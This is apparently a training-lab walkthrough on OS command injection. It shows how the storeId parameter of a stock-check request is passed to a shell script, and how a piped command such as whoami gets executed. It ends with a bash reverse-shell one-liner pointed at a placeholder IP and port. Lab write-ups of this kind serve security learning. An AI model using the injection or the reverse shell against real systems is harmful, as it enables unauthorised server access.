OS command injection, simple case


Level: Apprentice

  • The lab says that we need some way to execute the command whoami.

  • Start doing some recon to see if you can see an interesting parameter on the POST requests or in the URL

  • The parameter in this lab is the StoreId .

  • The application is getting the number of units using a regex on the system. Like ( " stockreport.pl 381 29 " or " stockreport.pl & echo aiwefwlguh & 29 ")

  • Remember that in Linux we can use a pipe to take STDOUT of command and transfer it to STDIN of the subsequent command.

  • To make a simple test we put a "|" (pipe) <command>, like in the following image.

  • In this case the code is not too much sanitized, but it gets more complicated than this.

  • Now if we want to get access to a server using this vulnerability, we can use the following payload: bash -c "bash -i >& /dev/tcp/<Your_IP>/<Port> 0>&1"

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